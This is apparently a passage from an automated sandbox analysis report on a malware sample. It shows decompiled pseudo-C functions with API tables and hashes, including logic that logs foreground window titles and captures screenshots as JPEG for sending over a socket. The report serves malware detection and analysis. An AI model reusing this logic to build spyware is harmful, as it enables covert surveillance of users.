									asm("cdq");
									 *(_t101 + 0x18) = (_t59 + 4) % _t87;
									_t63 = E00450BC0(_t76, _v12, 0xe10, 0);
									 *(_t101 + 8) = _t63;
									_t77 = _t76 - _t63 * 0xe10;
									asm("sbb edi, edx");
									_t65 = E00450BC0(_t77, _v12, 0x3c, 0);
									 *(_t101 + 0x20) =  *(_t101 + 0x20) & 0x00000000;
									 *(_t101 + 4) = _t65;
									_t67 = 0;
									__eflags = 0;
									 *_t101 = _t77 - _t65 * 0x3c;
									L17:
									return _t67;
								} else {
									do {
										_t56 = _t56 + 1;
										__eflags =  *((intOrPtr*)(_t86 + _t56 * 4)) - _t91;
									} while ( *((intOrPtr*)(_t86 + _t56 * 4)) < _t91);
									goto L16;
								}
							}
							if(__eflags > 0) {
								L10:
								_t68 = E0043A504();
								_t102 = 0x16;
								 *_t68 = _t102;
								L11:
								_t67 = _t102;
								goto L17;
							}
							__eflags = _t47 - 0x934126cf;
							if(__eflags <= 0) {
								goto L12;
							}
							goto L10;
						}
						if(__eflags < 0) {
							goto L10;
						}
						__eflags = _t47 - 0xffff5740;
						if(_t47 < 0xffff5740) {
							goto L10;
						}
						goto L7;
					}
					_t69 = E0043A504();
					_t102 = 0x16;
					 *_t69 = _t102;
					E0043695D();
					goto L11;
				}
				_t71 = E0043A504();
				_t103 = 0x16;
				 *_t71 = _t103;
				E0043695D();
				return _t103;
			}

0x0043c48a
0x0043c48f
0x0043c4af
0x0043c4b0
0x0043c4b2
0x0043c4b5
0x0043c4b7
0x0043c4ca
0x0043c4cd
0x0043c4cf
0x0043c4d2
0x0043c4d5
0x0043c4d8
0x0043c4e3
0x0043c4e5
0x0043c4e6
0x0043c4e8
0x0043c504
0x0043c508
0x0043c511
0x0043c516
0x0043c51d
0x0043c52a
0x0043c52f
0x0043c539
0x0043c53e
0x0043c543
0x0043c545
0x0043c54c
0x0043c54e
0x0043c54e
0x0043c553
0x0043c558
0x0043c559
0x0043c55c
0x0043c564
0x0043c564
0x0043c565
0x0043c573
0x0043c57b
0x0043c588
0x0043c589
0x0043c593
0x0043c599
0x0043c5a3
0x0043c5aa
0x0043c5ae
0x0043c5b2
0x0043c5b7
0x0043c5bb
0x0043c5c3
0x0043c5c3
0x0043c5c5
0x0043c5c8
0x00000000
0x0043c55e
0x0043c55e
0x0043c55e
0x0043c55f
0x0043c55f
0x00000000
0x0043c55e
0x0043c55c
0x0043c4ea
0x0043c4f3
0x0043c4f3
0x0043c4fa
0x0043c4fb
0x0043c4fd
0x0043c4fd
0x00000000
0x0043c4fd
0x0043c4ec
0x0043c4f1
0x00000000
0x00000000
0x00000000
0x0043c4f1
0x0043c4da
0x00000000
0x00000000
0x0043c4dc
0x0043c4e1
0x00000000
0x00000000
0x00000000
0x0043c4e1
0x0043c4b9
0x0043c4c0
0x0043c4c1
0x0043c4c3
0x00000000
0x0043c4c3
0x0043c491
0x0043c498
0x0043c499
0x0043c49b
0x00000000

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction ID: 733164f05b9f7aeaec00074263a2a0c70db5c9dd2c0fe6a7367e2e5b9d18385d
Opcode Fuzzy Hash: 0a5fab5ada6cfef24b75fb2c047679192d29c36a38110dc1207f8a641355624c
Instruction Fuzzy Hash: 20412972600714BFD7249F78CC81B6ABBE8EB8C714F10952FF111EB281D779A9018B84

Uniqueness

Uniqueness Score: -1.00%

Function 00408A51, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 82
sleepCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00408A51() {
				char _v2004;
				char _v2012;
				char _v2028;
				void* _v2036;
				char _v2056;
				void* _v2060;
				char _v2080;
				void* _v2084;
				void* _t15;
				signed int _t17;
				void* _t30;
				void* _t32;
				void* _t34;
				void* _t35;
				void* _t59;
				void* _t61;
				signed int _t62;
				signed int _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t68;

				_t63 = _t62 & 0xfffffff8;
				_t69 = _t63;
				_t64 = _t63 - 0x81c;
				_push(_t34);
				_t59 = Sleep;
				_t61 = _t35;
				while(1) {
					L00431F00(_t59,  &_v2004, 0, 0x7d0);
					_t65 = _t64 + 0xc;
					while(1) {
						_t15 = L00401F95(L00401E49(0x46c578, _t56, _t69, 0x2a));
						_t66 = _t65 - 0x18;
						E0040427F(_t34, _t66, _t15);
						_t17 = E00417ABF( &_v2012, _t56);
						_t65 = _t66 + 0x18;
						_t69 = _t17;
						if(_t17 != 0) {
							break;
						}
						Sleep(0x1f4);
					}
					_t56 = E00404405(_t34,  &_v2056, L"\r\n[ ", __eflags, E0040427F(_t34,  &_v2028,  &_v2004));
					L00401EFA(_t61 + 4, _t20, _t61, E004030A6(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
					_t67 = _t65 - 0x18;
					E00407350(_t34, _t67, _t56, __eflags, _t61 + 0x60);
					E00408742(_t61);
					while(1) {
						_t30 = L00401F95(L00401E49(0x46c578, _t56, __eflags, 0x2a));
						_t68 = _t67 - 0x18;
						E0040427F(_t34, _t68, _t30);
						_t32 = E00417ABF(0, _t56);
						_t64 = _t68 + 0x18;
						__eflags = _t32;
						if(__eflags == 0) {
							break;
						}
						Sleep(0x64);
					}
					E004095A9(_t34, _t61);
				}
			}

0x00408a54
0x00408a54
0x00408a57
0x00408a5d
0x00408a60
0x00408a66
0x00408a68
0x00408a74
0x00408a79
0x00408a7c
0x00408a8a
0x00408a8f
0x00408a95
0x00408a9e
0x00408aa3
0x00408aa6
0x00408aa8
0x00000000
0x00000000
0x00408aaf
0x00408aaf
0x00408ad6
0x00408ae6
0x00408aef
0x00408af8
0x00408b01
0x00408b06
0x00408b0f
0x00408b16
0x00408b1b
0x00408b29
0x00408b2e
0x00408b34
0x00408b3b
0x00408b40
0x00408b43
0x00408b45
0x00000000
0x00000000
0x00408b49
0x00408b49
0x00408b4f
0x00408b4f

APIs

Part of subcall function 00417ABF: GetForegroundWindow.USER32(74B06490,?), ref: 00417ACF
Part of subcall function 00417ABF: GetWindowTextLengthW.USER32(00000000), ref: 00417AD8
Part of subcall function 00417ABF: GetWindowTextW.USER32 ref: 00417B02

Sleep.KERNEL32(000001F4), ref: 00408AAF
Sleep.KERNEL32(00000064), ref: 00408B49

Strings

[ , xrefs: 00408AC7
], xrefs: 00408AB3

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
Instruction ID: 8573281f0cdc3ffc3b69c5d15ae9f7dd0d08734189249b75f226d29c1755f02c
Opcode Fuzzy Hash: 61ffcbbbe14b13f04157bb48f78c33ab662183f2310c94efc5ab64b36d35b440
Instruction Fuzzy Hash: EE21B0B160420067C604B676DD1396F72699F90348F40043FF982772E3EE3DAA09869F

Uniqueness

Uniqueness Score: -1.00%

Function 0043D288, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043D288(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				short** _t16;
				char* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46b4d4; // 0x3200d70
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = WideCharToMultiByte(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0043F348(_t13, _t11, 1);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004401F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(WideCharToMultiByte(0, 0,  *_t16, 0xffffffff, _t19, _t11, 0, 0) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									L00447D3F();
									E004401F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0043d288
0x0043d28b
0x0043d293
0x0043d29c
0x0043d2f1
0x0043d2aa
0x0043d2b0
0x0043d2b4
0x0043d302
0x0043d302
0x0043d2b6
0x0043d2be
0x0043d2c1
0x0043d2c4
0x0043d2fb
0x0043d2fc
0x00000000
0x0043d2c6
0x0043d2d0
0x0043d2dc
0x00000000
0x0043d2de
0x0043d2de
0x0043d2df
0x0043d2e0
0x0043d2e6
0x0043d2eb
0x0043d2ee
0x00000000
0x0043d2ee
0x0043d2dc
0x0043d2c4
0x0043d2f7
0x0043d2fa
0x00000000
0x0043d2fa
0x0043d2f5
0x00000000
0x0043d295
0x0043d299
0x0043d299
0x00000000

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d7ea2dda99bdf1a5baddc8ebb5476e6ddbd4819cffeae7dbf45a33327a8bcff
Instruction ID: e4b0062e58d0d7237c716dd182029255e048b2798701f0240ba592bb915f7d8f
Opcode Fuzzy Hash: 2d7ea2dda99bdf1a5baddc8ebb5476e6ddbd4819cffeae7dbf45a33327a8bcff
Instruction Fuzzy Hash: 5101F2B2A097063EF6212A783CC1F27220CDF453B8F341B6BF521622D5DE78CC014168

Uniqueness

Uniqueness Score: -1.00%

Function 0043D307, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0043D307(signed int __eax, void* __ecx) {
				signed int _t2;
				signed int _t3;
				int _t10;
				int _t11;
				void* _t13;
				char** _t16;
				short* _t19;
				void* _t20;

				_t13 = __ecx;
				_t16 =  *0x46b4d0; // 0x31e72c8
				if(_t16 != 0) {
					_t10 = 0;
					while( *_t16 != _t10) {
						_t2 = MultiByteToWideChar(_t10, _t10,  *_t16, 0xffffffff, _t10, _t10);
						_t11 = _t2;
						if(_t11 == 0) {
							L11:
							_t3 = _t2 | 0xffffffff;
						} else {
							_t19 = E0043F348(_t13, _t11, 2);
							_pop(_t13);
							if(_t19 == 0) {
								L10:
								_t2 = E004401F5(_t19);
								goto L11;
							} else {
								_t10 = 0;
								if(MultiByteToWideChar(0, 0,  *_t16, 0xffffffff, _t19, _t11) == 0) {
									goto L10;
								} else {
									_push(0);
									_push(_t19);
									L00447D4A(_t13);
									E004401F5(0);
									_t20 = _t20 + 0xc;
									_t16 =  &(_t16[1]);
									continue;
								}
							}
						}
						L9:
						return _t3;
						goto L12;
					}
					_t3 = 0;
					goto L9;
				} else {
					return __eax | 0xffffffff;
				}
				L12:
			}

0x0043d307
0x0043d30a
0x0043d312
0x0043d31b
0x0043d36a
0x0043d327
0x0043d32d
0x0043d331
0x0043d37b
0x0043d37b
0x0043d333
0x0043d33b
0x0043d33e
0x0043d341
0x0043d374
0x0043d375
0x00000000
0x0043d343
0x0043d349
0x0043d355
0x00000000
0x0043d357
0x0043d357
0x0043d358
0x0043d359
0x0043d35f
0x0043d364
0x0043d367
0x00000000
0x0043d367
0x0043d355
0x0043d341
0x0043d370
0x0043d373
0x00000000
0x0043d373
0x0043d36e
0x00000000
0x0043d314
0x0043d318
0x0043d318
0x00000000

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358d2ebe22e0fac5e762d4d2c54784e1e8a07e1aed447b8554893cb34318dc26
Instruction ID: af3406132430cef04dbb00c021b8739ed0fb4e326e8fb5295b0caa8951ed8692
Opcode Fuzzy Hash: 358d2ebe22e0fac5e762d4d2c54784e1e8a07e1aed447b8554893cb34318dc26
Instruction Fuzzy Hash: 6D0167B29096167AA71125797CC1D6B631CEF553B9B20132BB921512D1DA78CC114169

Uniqueness

Uniqueness Score: -1.00%

Function 00408BC0, Relevance: 6.1, APIs: 4, Instructions: 58
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E00408BC0(void* __ecx, void* __edx) {
				void* __ebx;
				signed int _t8;
				int _t9;
				long _t14;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t30;

				_t22 = __edx;
				_t8 =  *0x46c3f8; // 0x1312d00
				_t9 = _t8 |  *0x46c3fc;
				_t24 = __ecx;
				if(_t9 != 0) {
					 *((char*)(__ecx + 0x39)) = 0;
					do {
						_t9 = CreateFileW(L00401EEB(0x46c3b0), 0x80000000, 7, 0, 3, 0x80, 0);
						_t23 = _t9;
						if(_t23 == 0xffffffff) {
							 *((char*)(_t24 + 0x39)) = 0;
						} else {
							_t14 = GetFileSize(_t23, 0);
							_t30 = 0 -  *0x46c3fc; // 0x0
							if(_t30 >= 0 && (_t30 > 0 || _t14 >=  *0x46c3f8)) {
								 *((char*)(_t24 + 0x39)) = 1;
								if( *((intOrPtr*)(_t24 + 0x49)) != 0) {
									E004095A9(0, _t24);
								}
								Sleep(0x2710);
							}
							_t9 = CloseHandle(_t23);
						}
					} while ( *((char*)(_t24 + 0x39)) == 1);
					if( *((intOrPtr*)(_t24 + 0x49)) == 0) {
						_t35 =  *0x46a9d4 - 0x31;
						if( *0x46a9d4 == 0x31) {
							E00407350(0, _t25 - 0x18, _t22, _t35, _t24 + 0x60);
							return E00408742(_t24);
						}
					}
				}
				return _t9;
			}

0x00408bc0
0x00408bc0
0x00408bc5
0x00408bce
0x00408bd0
0x00408bd8
0x00408bdb
0x00408bf6
0x00408bfc
0x00408c01
0x00408c41
0x00408c03
0x00408c05
0x00408c0b
0x00408c11
0x00408c1d
0x00408c24
0x00408c28
0x00408c28
0x00408c32
0x00408c32
0x00408c39
0x00408c39
0x00408c44
0x00408c4d
0x00408c4f
0x00408c56
0x00408c61
0x00000000
0x00408c68
0x00408c56
0x00408c4d
0x00408c70

APIs

CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00408C97), ref: 00408BF6
GetFileSize.KERNEL32(00000000,00000000,?,?,?,00408C97), ref: 00408C05
Sleep.KERNEL32(00002710,?,?,?,00408C97), ref: 00408C32
CloseHandle.KERNEL32(00000000,?,?,?,00408C97), ref: 00408C39

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: File$CloseCreateHandleSizeSleep
String ID:
API String ID: 1958988193-0
Opcode ID: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
Instruction ID: f48aa324faeb3bf29cf9054a7041348a4769ce812d4e844a5eb2815f39313da9
Opcode Fuzzy Hash: fd32d5470f6a82b64451d4a6fc001d2afe9d9ea922123fe35fcf77b3356e9bff
Instruction Fuzzy Hash: F9112B702067406FFA35AB349EC962F7AA99741741F04487FF6C2726D2CA79D894833E

Uniqueness

Uniqueness Score: -1.00%

Function 00442033, Relevance: 6.1, APIs: 4, Instructions: 52
libraryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00442033(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x46b658 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x458b78 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x1e1e4201
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}

0x00442038
0x0044203c
0x00442043
0x00442047
0x00442055
0x0044206b
0x0044206f
0x00442098
0x0044209a
0x0044209e
0x004420a1
0x004420a1
0x004420a7
0x004420a9
0x00000000
0x004420aa
0x00442071
0x0044207a
0x00442089
0x0044207c
0x0044207f
0x00442085
0x00442085
0x0044208d
0x00000000
0x0044208f
0x00442092
0x00442094
0x00000000
0x00442094
0x0044208d
0x00442049
0x0044204e
0x00000000

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,0046C518,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue), ref: 00442065
GetLastError.KERNEL32(?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000,00000364,?,00441DB4), ref: 00442071
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00441FDA,0046C518,00000000,00000000,00000000,?,00442306,00000006,FlsSetValue,00459068,00459070,00000000), ref: 0044207F

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction ID: 1f93bee859a7bc905b4f209078c92e3314857c5c8a056cdaea3c14562744cb27
Opcode Fuzzy Hash: 5876dbb1db08068e45b27a8b40375508f8d8c7a9e5a20dc41c15f5dc73dd1d81
Instruction Fuzzy Hash: EC01D432601723ABD7314E789D44A6777D8AF55BA2BA00632FB06D3241DB64D801C6E9

Uniqueness

Uniqueness Score: -1.00%

Function 00417678, Relevance: 6.0, APIs: 4, Instructions: 37COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000), ref: 0041768D
GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 004176AF
CloseHandle.KERNEL32(00000000), ref: 004176BA
CloseHandle.KERNEL32(00000000), ref: 004176C2

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseHandle$FileModuleNameOpenProcess
String ID:
API String ID: 3706008839-0
Opcode ID: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction ID: f8a04bcb30d388e69ca110f6c0d2bfbdbb8b62fcd9983a5c8f5887249ce98a8e
Opcode Fuzzy Hash: 26b55f5a258af6edc2e09f8168abb4a95287f2a40d9827df7da255adfb7933c9
Instruction Fuzzy Hash: 44F0E9312447156BD6205A585C09FAB367C8784B93F100177F908D5292EEA4D94246AE

Uniqueness

Uniqueness Score: -1.00%

Function 0041459C, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 249
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0041459C(signed int __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v112;
				intOrPtr _v116;
				intOrPtr _v144;
				char _v196;
				char _v220;
				void* _v224;
				char _v244;
				void* _v248;
				char _v268;
				void* _v272;
				char _v292;
				void* _v296;
				char _v300;
				char _v308;
				char _v316;
				void* _v320;
				char* _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				char _v340;
				void* _v344;
				void* _v352;
				intOrPtr _v356;
				char _v364;
				void* _v368;
				char _v380;
				char _v384;
				void* _v392;
				char _v404;
				signed int _v432;
				char _v448;
				char _v452;
				void* _v476;
				char _v480;
				intOrPtr _v484;
				char _v492;
				char _v500;
				char _v504;
				char _v512;
				char _v516;
				void* __ebx;
				void* __edi;
				intOrPtr* _t63;
				void* _t98;
				void* _t99;
				intOrPtr* _t125;
				char* _t134;
				intOrPtr _t192;
				intOrPtr* _t203;
				signed int _t218;
				void* _t220;
				void* _t221;

				_t187 = __edx;
				_t220 = (_t218 & 0xfffffff8) - 0x1ac;
				 *0x46bd74 = _a4;
				_v432 = __ecx & 0x000000ff;
				E00414906( &_v380, __edx, __eflags, _a4);
				if(E00402489() != 0) {
					_t134 =  &_v380;
					_t63 =  *0x46bb04(L00401F95(_t134), E00402489());
					_t125 = _t63;
					E0041441B( &_v364, _t125);
					L00414C72(L"image/jpeg",  &_v300);
					_v356 = 1;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v336 = 1;
					_v332 = 4;
					_v328 =  &_v448;
					_t203 =  *0x46bb04(0, 0, _t134);
					E004144B7( &_v308,  &_v380, _t203,  &_v308,  &_v364);
					 *((intOrPtr*)( *_t203 + 0x30))(_t203,  &_v112, 1);
					E0040524E(_t125,  &_v452,  &_v300, _t203, _v116, 0);
					asm("xorps xmm0, xmm0");
					asm("movlpd [esp+0x18], xmm0");
					 *((intOrPtr*)( *_t203 + 0x14))(_t203, _v484, _v480, 0, 0);
					 *((intOrPtr*)( *_t203 + 0xc))(_t203, L00401F95( &_v480), _v144, 0);
					 *((intOrPtr*)( *_t125 + 8))(_t125);
					 *((intOrPtr*)( *_t203 + 8))(_t203);
					E0043BACE( &_v504, E00402489(),  &_v516, 0xa);
					_t221 = _t220 + 0xc;
					__eflags =  *0x46bd6a - 1;
					if( *0x46bd6a != 1) {
						__eflags =  *0x46c8b4 - 0xffffffff;
						if(__eflags != 0) {
							L00402F93(_t125, _t221 - 0x18, E004075E6( &_v384,  &_v492, __eflags, 0x46c238), __eflags,  &_v480);
							_push(0x4d);
							E00404AA4(_t125, 0x46c8b0, _t88, __eflags);
						} else {
							E0040498B(0x46c8b0);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E00404A08( &_v300);
							E00404B8D(0x46c8b0, 0x414f84);
							_t98 = E0041733B( &_v404, 0x46c898);
							_t192 =  *0x46bd70; // 0x0
							_t99 = E00417226(0x46c8b0,  &_v196, _t192);
							L00402F1D(_t221 - 0xfffffffffffffff8, L00402F93(0x46c8b0,  &_v364, L00402F1D( &_v340, L00402F93(0x46c8b0,  &_v316, L00402F93(0x46c8b0,  &_v292, L00402F93(0x46c8b0,  &_v268, L00402F93(0x46c8b0,  &_v244, E004075E6( &_v220,  &_v512, __eflags, 0x46c238), __eflags,  &_v500), __eflags, 0x46c238), __eflags, 0x46c868), __eflags, 0x46c238), _t99), __eflags, 0x46c238), _t98);
							_push(0x10);
							E00404AA4(0x46c8b0, 0x46c8b0, _t107, __eflags);
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
							E00401FC7();
						}
						E00401FC7();
					} else {
						E00404E0B(0x46c8b0);
					}
					E00414441(E00401FC7(),  &_v452);
				} else {
					if( *0x46bd6a != 1) {
						__eflags =  *0x46c8b4 - 0xffffffff;
						if(__eflags == 0) {
							E0040498B(0x46c8b0);
							_t220 = _t220 - 0x10;
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							E00404A08(__edx);
						}
						E004020EC(0x46c8b0, _t220 - 0x18, _t187, __eflags, 0x46c868);
						_push(0x4e);
						E00404AA4(0x46c8b0, 0x46c8b0, _t187, __eflags);
					} else {
						E00404E0B(0x46c8b0);
					}
				}
				return E00401FC7();
			}

0x0041459c
0x004145a2
0x004145b6
0x004145bc
0x004145c0
0x004145d1
0x0041463c
0x00414646
0x0041464d
0x00414654
0x00414665
0x00414676
0x0041467a
0x0041467b
0x0041467c
0x0041467d
0x00414680
0x00414689
0x00414695
0x004146a2
0x004146b6
0x004146c8
0x004146d7
0x004146de
0x004146e3
0x004146f2
0x0041470b
0x00414711
0x00414717
0x0041472b
0x00414730
0x00414733
0x0041473a
0x0041474b
0x00414752
0x004148c6
0x004148cc
0x004148d3
0x00414758
0x0041475f
0x00414770
0x00414771
0x00414772
0x00414773
0x00414774
0x00414780
0x00414791
0x00414796
0x004147af
0x00414831
0x00414837
0x0041483b
0x00414847
0x00414853
0x0041485f
0x0041486b
0x00414877
0x00414883
0x0041488f
0x0041489b
0x0041489b
0x004148df
0x0041473c
0x00414741
0x00414741
0x004148f1
0x004145d3
0x004145da
0x004145eb
0x004145f7
0x004145fb
0x00414600
0x0041460c
0x0041460d
0x0041460e
0x0041460f
0x00414610
0x00414610
0x0041461f
0x00414624
0x00414628
0x004145dc
0x004145e1
0x004145e1
0x004145da
0x00414905

APIs

Part of subcall function 00414906: CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
Part of subcall function 00414906: CreateCompatibleDC.GDI32(00000000), ref: 0041492D

SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00414646
SHCreateMemStream.SHLWAPI(00000000), ref: 0041469C

Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11

Strings

image/jpeg, xrefs: 00414660

Memory Dump Source

Source File: 00000018.00000002.448878959.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000018.00000002.449127072.000000000046F000.00000040.00000001.sdmp Download File

Similarity

API ID: Create$Stream$Compatibleclosesocket
String ID: image/jpeg
API String ID: 3038386933-3785015651
Opcode ID: 5d5206489b6c5c193360d77052477a81b258d00dd93eef41709245a492873c69
Instruction ID: 76b108af669c3063bc8327b28f0eeeb389dcf0988f89de8eeeeaadbda1c1d6eb
Opcode Fuzzy Hash: 5d5206489b6c5c193360d77052477a81b258d00dd93eef41709245a492873c69
Instruction Fuzzy Hash: F8816D716083419BC324FB25C985AEFB3A4AFC5318F00493FB5969B1D1EF785945CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00447399, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00447399(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v22;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _t48;
				int _t51;
				signed int _t54;
				signed int _t55;
				short _t58;
				signed char _t62;
				signed int _t63;
				signed char* _t72;
				signed char* _t73;
				int _t78;
				signed int _t81;
				signed char* _t82;
				short* _t83;
				int _t87;
				signed char _t88;
				signed int _t89;
				signed int _t91;
				signed int _t92;
				int _t94;
				int _t95;
				intOrPtr _t98;
				signed int _t99;

				_t48 =  *0x46a00c; // 0x1e1e4200
				_v8 = _t48 ^ _t99;
				_t98 = _a8;
				_t78 = L00446F6C(__eflags, _a4);
				if(_t78 != 0) {
					_t94 = 0;
					__eflags = 0;
					_t81 = 0;
					_t51 = 0;
					_v32 = 0;
					while(1) {
						__eflags =  *((intOrPtr*)(_t51 + 0x46a488)) - _t78;
						if( *((intOrPtr*)(_t51 + 0x46a488)) == _t78) {
							break;
						}
						_t81 = _t81 + 1;
						_t51 = _t51 + 0x30;
						_v32 = _t81;
						__eflags = _t51 - 0xf0;
						if(_t51 < 0xf0) {
							continue;
						} else {
							__eflags = _t78 - 0xfde8;
							if(_t78 == 0xfde8) {
								L23:
							} else {
								__eflags = _t78 - 0xfde9;
								if(_t78 == 0xfde9) {
									goto L23;
								} else {
									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
									__eflags = _t51;
									if(_t51 == 0) {
										goto L23;
									} else {
										_t7 =  &_v28; // 0x44723a
										_t51 = GetCPInfo(_t78, _t7);
										__eflags = _t51;
										if(_t51 == 0) {
											__eflags =  *0x46ba28 - _t94; // 0x0
											if(__eflags == 0) {
												goto L23;
											} else {
												L00446FDF(_t98);
												goto L37;
											}
										} else {
											L00431F00(_t94, _t98 + 0x18, _t94, 0x101);
											 *(_t98 + 4) = _t78;
											 *(_t98 + 0x21c) = _t94;
											_t78 = 1;
											__eflags = _v28 - 1;
											if(_v28 <= 1) {
												 *(_t98 + 8) = _t94;
											} else {
												__eflags = _v22;
												_t72 =  &_v22;
												if(_v22 != 0) {
													while(1) {
														_t88 = _t72[1];
														__eflags = _t88;
														if(_t88 == 0) {
															goto L16;
														}
														_t91 = _t88 & 0x000000ff;
														_t89 =  *_t72 & 0x000000ff;
														while(1) {
															__eflags = _t89 - _t91;
															if(_t89 > _t91) {
																break;
															}
															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
															_t89 = _t89 + 1;
															__eflags = _t89;
														}
														_t72 =  &(_t72[2]);
														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = L00446F2E( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
